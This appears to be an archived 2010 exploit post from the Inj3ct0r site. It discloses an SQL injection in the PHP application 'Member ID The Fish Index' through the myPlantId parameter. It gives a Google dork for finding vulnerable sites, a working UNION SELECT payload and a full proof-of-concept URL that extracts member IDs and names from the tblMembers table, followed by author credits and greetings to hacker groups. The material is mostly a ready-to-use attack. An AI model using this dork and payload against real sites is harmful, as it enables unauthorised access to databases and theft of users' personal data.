Member ID The Fish Index PHP SQL Injection Vulnerability
Posted on 03 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Member ID The Fish Index PHP SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================================== Member ID The Fish Index PHP SQL Injection Vulnerability ======================================================== ************************************************************************* , | ,---. , . |---. ,---. ,---. ,---. ,---. ,---. , . , | --- | | | | | |---' | | | |---' | | | | `---' `---| `---' `---' ` `---' ` `---' `---`--- ` `---' ************************************************************************* [V] Member ID The Fish Index PHP SQL Injection Vulnerability --==[ Author ]==-- [+] Author : v4lc0m87 [+] Contact : valcom87[at]gmail[dot]com [+] Group : INDONESIAN CYBER [+] Site : http://indonesian-cyber.org/ [+] Date : June, 3-2010 [INDONESIA] ************************************************************************* --==[ Details ]==-- [+] Vulnerable : SQL Injection [+] Google Dork : inurl:index.php?myPlantId= +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [-] Exploit : [+] 9/**/union/**/all/**/select/**/9,9,9,concat_ws%280x3a,MemberID,MembeFirstName%29v4lc0m87,9,9/**/from/**/tblMembers-- [-] Remote SQLi p0c : [+] http://127.0.0.1/[path]/index.php?myPlantId=9/**/union/**/all/**/select/**/9,9,9,concat_ws%280x3a,MemberID,MembeFirstName%29v4lc0m87,9,9/**/from/**/tblMembers-- +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ INDONESIAN-CYBER.ORG | DEVILZC0DE.ORG | INDONESIANHACKER.ORG | HACKER-CISADANE.ORG | IDC [V] Greetz : SaruKusai, MarilynMesum (smoga jadi pasangan sejati wkwkwkwk) Team m0n0n banci kamera(clase_1214n,c4uR,astroboyyy,aldy182,vhesckot_1601) Bocah tua nakal (mbah l4mpor,awchoy) flyff666 cruz3N petimati spykit v3n0m uzanc kokoh wisdom (di FB koq curhat mlu sih koh :p) blue screen, skutengboy (kalian pasangan yg serasi juga loh, jikakakakakk) [K]urabu[S]aru [RnR] cO2 community and y0u !! # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-03]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
